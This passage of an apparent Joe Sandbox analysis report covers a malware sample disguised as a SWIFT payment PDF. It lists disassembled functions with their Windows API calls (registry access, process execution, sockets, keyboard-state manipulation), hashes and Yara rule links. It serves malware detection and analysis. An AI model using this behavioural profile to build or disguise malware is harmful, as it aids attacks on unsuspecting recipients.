                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArraySafeVartype
                                                                                    • String ID:
                                                                                    • API String ID: 1725837607-0
                                                                                    • Opcode ID: 13bf80833b65b782475129d3dcb5dc65dedbc9c12c9c25394010f490756636c5
                                                                                    • Instruction ID: 9678d7f8ec7750e416011f602cedcb0dc1c1543547a7bae21eedacc9f7ffdf0a
                                                                                    • Opcode Fuzzy Hash: 13bf80833b65b782475129d3dcb5dc65dedbc9c12c9c25394010f490756636c5
                                                                                    • Instruction Fuzzy Hash: 88C18A75A0521ADFDB00CF98C485BAEB7F5FF09315F20846AE606E7291D734AA81CF91
                                                                                    Function 00966B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00966B63
                                                                                    • LoadStringW.USER32(00000000), ref: 00966B6A
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00966B80
                                                                                    • LoadStringW.USER32(00000000), ref: 00966B87
                                                                                    • _wprintf.LIBCMT ref: 00966BAD
                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00966BCB
                                                                                    Strings
                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00966BA8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                    • API String ID: 3648134473-3128320259
                                                                                    • Opcode ID: a3d9b6675b0c3980a53c6f691b20a84d671aae4d1f006c6985984fefde4b3037
                                                                                    • Instruction ID: 86a79dc40cba7091543d3d3d7e1554a2de37bf7aa36876325dce424d5f080f9c
                                                                                    • Opcode Fuzzy Hash: a3d9b6675b0c3980a53c6f691b20a84d671aae4d1f006c6985984fefde4b3037
                                                                                    • Instruction Fuzzy Hash: FA0131F6904208BFEB11ABA49D89EF7776CDB09304F0044A1B746E2451EA749E849FB1
                                                                                    Function 00982B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00983C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00982BB5,?,?), ref: 00983C1D
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00982BF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharConnectRegistryUpper
                                                                                    • String ID:
                                                                                    • API String ID: 2595220575-0
                                                                                    • Opcode ID: 1a3fd1e20db824ce59d6784d309db38e849c3335ff37cfe3af467d32f5a71456
                                                                                    • Instruction ID: 9c21f9f5afe00c8c5094b6ca8c910883db2b233d2ea3400c0a4c2840508bbf52
                                                                                    • Opcode Fuzzy Hash: 1a3fd1e20db824ce59d6784d309db38e849c3335ff37cfe3af467d32f5a71456
                                                                                    • Instruction Fuzzy Hash: 34915975204211AFCB00EF54C891B6EBBE9FF88310F14885DF9969B2A2DB34E945DF42
                                                                                    Function 009795BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • select.WSOCK32 ref: 00979691
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0097969E
                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 009796C8
                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 009796E9
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 009796F8
                                                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 009797AA
                                                                                    • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,009BDC00), ref: 00979765
                                                                                      • Part of subcall function 0095D2FF: _strlen.LIBCMT ref: 0095D309
                                                                                    • _strlen.LIBCMT ref: 00979800
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                    • String ID:
                                                                                    • API String ID: 3480843537-0
                                                                                    • Opcode ID: 843cead585b9e4be06fa3b6bc8a7ef34224e7d2834351146cf0581de046e6629
                                                                                    • Instruction ID: 3a65af3ab4933e24f46d5ddd890fbe0348f78cddc83a709bc8902be63028c8f8
                                                                                    • Opcode Fuzzy Hash: 843cead585b9e4be06fa3b6bc8a7ef34224e7d2834351146cf0581de046e6629
                                                                                    • Instruction Fuzzy Hash: F5818072508240ABC714EF64DC85F6FB7A9EFC5714F108A1DF5599B2A1EB30D904CB92
                                                                                    Function 0094A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __mtinitlocknum.LIBCMT ref: 0094A991
                                                                                      • Part of subcall function 00947D7C: __FF_MSGBANNER.LIBCMT ref: 00947D91
                                                                                      • Part of subcall function 00947D7C: __NMSG_WRITE.LIBCMT ref: 00947D98
                                                                                      • Part of subcall function 00947D7C: __malloc_crt.LIBCMT ref: 00947DB8
                                                                                    • __lock.LIBCMT ref: 0094A9A4
                                                                                    • __lock.LIBCMT ref: 0094A9F0
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,009D6DE0,00000018,00955E7B,?,00000000,00000109), ref: 0094AA0C
                                                                                    • EnterCriticalSection.KERNEL32(8000000C,009D6DE0,00000018,00955E7B,?,00000000,00000109), ref: 0094AA29
                                                                                    • LeaveCriticalSection.KERNEL32(8000000C), ref: 0094AA39
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                    • String ID:
                                                                                    • API String ID: 1422805418-0
                                                                                    • Opcode ID: 1b7d4127c481976624b8f0b37ec0a586f92e97a957394e1e8c30860210ab79a2
                                                                                    • Instruction ID: 667dd29dfa44ca8300eecc6380dbf819fe6753876c0fce5620e3e554a881a9f6
                                                                                    • Opcode Fuzzy Hash: 1b7d4127c481976624b8f0b37ec0a586f92e97a957394e1e8c30860210ab79a2
                                                                                    • Instruction Fuzzy Hash: 2A416C71A542069BEB14DFA8DA84F5CB7B5BF45335F108318E425AF2D2DBB49C40CB82
                                                                                    Function 00988ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DeleteObject.GDI32(00000000), ref: 00988EE4
                                                                                    • GetDC.USER32(00000000), ref: 00988EEC
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00988EF7
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00988F03
                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00988F3F
                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00988F50
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0098BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00988F8A
                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00988FAA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3864802216-0
                                                                                    • Opcode ID: 5772b8fdf79863910878508b3295a02401f5fa3583458492fdf726a29716e181
                                                                                    • Instruction ID: c90be449714814bbadabdf26630b129de8bec1a2f026e1b758b72ba43c2e4a77
                                                                                    • Opcode Fuzzy Hash: 5772b8fdf79863910878508b3295a02401f5fa3583458492fdf726a29716e181
                                                                                    • Instruction Fuzzy Hash: FA317C72215214BFEB109F60CC4AFEB3BADEF4A715F044065FE09DA291CAB59841DBB0
                                                                                    Function 009716DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
                                                                                      • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
                                                                                      • Part of subcall function 0093C6F4: _wcscpy.LIBCMT ref: 0093C717
                                                                                    • _wcstok.LIBCMT ref: 0097184E
                                                                                    • _wcscpy.LIBCMT ref: 009718DD
                                                                                    • _memset.LIBCMT ref: 00971910
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                    • String ID: X
                                                                                    • API String ID: 774024439-3081909835
                                                                                    • Opcode ID: 0749334e8e982665e11a874f8672093b4359de07f528c77e0894fd32b9dcb57d
                                                                                    • Instruction ID: 0865df6b91b2973523b0d50dbaf1908313069a08ad89c9119dab8861a30d115e
                                                                                    • Opcode Fuzzy Hash: 0749334e8e982665e11a874f8672093b4359de07f528c77e0894fd32b9dcb57d
                                                                                    • Instruction Fuzzy Hash: 1CC17E716093519FC724EF28D895B9EB7E4BF85350F00892DF999972A2DB30ED05CB82
                                                                                    Function 00990133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093B34E: GetWindowLongW.USER32(?,000000EB), ref: 0093B35F
                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0099016D
                                                                                    • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0099038D
                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009903AB
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?), ref: 009903D6
                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009903FF
                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00990421
                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00990440
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                    • String ID:
                                                                                    • API String ID: 3356174886-0
                                                                                    • Opcode ID: 8f9ec229271eb3d04728262f49c522557467525f3f5e9a713db7f597168206a6
                                                                                    • Instruction ID: 90fea2dc776c4f9184b11346ffc14e136e3039bb05733cf9bcd1188d8fd5deb0
                                                                                    • Opcode Fuzzy Hash: 8f9ec229271eb3d04728262f49c522557467525f3f5e9a713db7f597168206a6
                                                                                    • Instruction Fuzzy Hash: 2FA18C35600616AFDF18CF6CC9867BDBBB5BF88701F088115E869AA290D734AD50DB90
                                                                                    Function 0093AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0621211ec946a38d186c57481123d91130326f93dcbf01affde20479ac6aeb40
                                                                                    • Instruction ID: 342656dcd27cd22a13bdc6dcd820e635a022149e6f2d3656c3812fbe98ba713b
                                                                                    • Opcode Fuzzy Hash: 0621211ec946a38d186c57481123d91130326f93dcbf01affde20479ac6aeb40
                                                                                    • Instruction Fuzzy Hash: 97718CB0904109EFCF14CF98CC89AAEBB78FF85314F248149F955AB250C734AA41CFA5
                                                                                    Function 00982230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0098225A
                                                                                    • _memset.LIBCMT ref: 00982323
                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00982368
                                                                                      • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
                                                                                      • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
                                                                                      • Part of subcall function 0093C6F4: _wcscpy.LIBCMT ref: 0093C717
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0098242F
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0098243E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                    • String ID: @
                                                                                    • API String ID: 4082843840-2766056989
                                                                                    • Opcode ID: eda9edd06ecd82185f29a1f37b76f1c7427f771234e7f59b6ff9530ac5929d10
                                                                                    • Instruction ID: 55f8d608b5ca4b0af18afcfdf5a40ef59c36dabe61e6444c8b08812bd3c9cf8d
                                                                                    • Opcode Fuzzy Hash: eda9edd06ecd82185f29a1f37b76f1c7427f771234e7f59b6ff9530ac5929d10
                                                                                    • Instruction Fuzzy Hash: 70716E75A006299FCF05EFA4D891AAEB7F5FF88710F108459E856AB391CB34AD40CF94
                                                                                    Function 00963DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetParent.USER32(?), ref: 00963DE7
                                                                                    • GetKeyboardState.USER32(?), ref: 00963DFC
                                                                                    • SetKeyboardState.USER32(?), ref: 00963E5D
                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00963E8B
                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00963EAA
                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00963EF0
                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00963F13
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 87235514-0
                                                                                    • Opcode ID: dc321f3f1452690332e89cc4fd63281a60fddb46fbbb4b54aa1ced86170af1dc
                                                                                    • Instruction ID: fbd91a65f0c76363e60ec9f6d39eecf59dc5fb40a86e1c8a0089e55e5fed6709
                                                                                    • Opcode Fuzzy Hash: dc321f3f1452690332e89cc4fd63281a60fddb46fbbb4b54aa1ced86170af1dc
                                                                                    • Instruction Fuzzy Hash: 4B51C1A0A187D53EFB3643248C55BBA7EA95F06304F08C589F0D5468C3D3A9AEC4D760
                                                                                    Function 00963BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetParent.USER32(00000000), ref: 00963C02
                                                                                    • GetKeyboardState.USER32(?), ref: 00963C17
                                                                                    • SetKeyboardState.USER32(?), ref: 00963C78
                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00963CA4
                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00963CC1
                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00963D05
                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00963D26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 87235514-0
                                                                                    • Opcode ID: ca07675f3d88338831b28d1a721d1a9a8a77b84f0913a627ea5c2a817b30f86f
                                                                                    • Instruction ID: 36eb11c0d1b9e75631b23aa3faab749cd889043f5fdd64cb0a95e7743d2e0d40
                                                                                    • Opcode Fuzzy Hash: ca07675f3d88338831b28d1a721d1a9a8a77b84f0913a627ea5c2a817b30f86f
                                                                                    • Instruction Fuzzy Hash: 0F51F5A09087D53DFB3287748C55BB6BFADAF06304F08C489F5D55A8C2D698EE84E760
                                                                                    Function 00967DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcsncpy$LocalTime
                                                                                    • String ID:
                                                                                    • API String ID: 2945705084-0
                                                                                    • Opcode ID: af09ed026013a15cbeecc684587cc4c73d417cebad842dca93d28d7fc50bf0b0
                                                                                    • Instruction ID: f102c73159de8bab264fbe377fe09ed95295fba97d7a5198f698d5a7da0901b7
                                                                                    • Opcode Fuzzy Hash: af09ed026013a15cbeecc684587cc4c73d417cebad842dca93d28d7fc50bf0b0
                                                                                    • Instruction Fuzzy Hash: 42417C66C24214B6CB11EBF4C88AECFB3ACAF85710F508966E518E3121FA35E65487A5
                                                                                    Function 00983D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00983DA1
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00983DCB
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00983E80
                                                                                      • Part of subcall function 00983D72: RegCloseKey.ADVAPI32(?), ref: 00983DE8
                                                                                      • Part of subcall function 00983D72: FreeLibrary.KERNEL32(?), ref: 00983E3A
                                                                                      • Part of subcall function 00983D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00983E5D
                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00983E25
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                    • String ID:
                                                                                    • API String ID: 395352322-0
                                                                                    • Opcode ID: 1354fb37305fc648003b634d349f048431477262265fdaee05755f33767f2cf3
                                                                                    • Instruction ID: 208f06324aa91b76159247d9494702f8dc3ad579a22e576a043c69c1680559d4
                                                                                    • Opcode Fuzzy Hash: 1354fb37305fc648003b634d349f048431477262265fdaee05755f33767f2cf3
                                                                                    • Instruction Fuzzy Hash: 2F313AB1915119BFDB14AF90DC89AFFB7BCEF09700F00416AE512E2251E6749F899BA0
                                                                                    Function 00988FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00988FE7
                                                                                    • GetWindowLongW.USER32(00FE7DC0,000000F0), ref: 0098901A
                                                                                    • GetWindowLongW.USER32(00FE7DC0,000000F0), ref: 0098904F
                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00989081
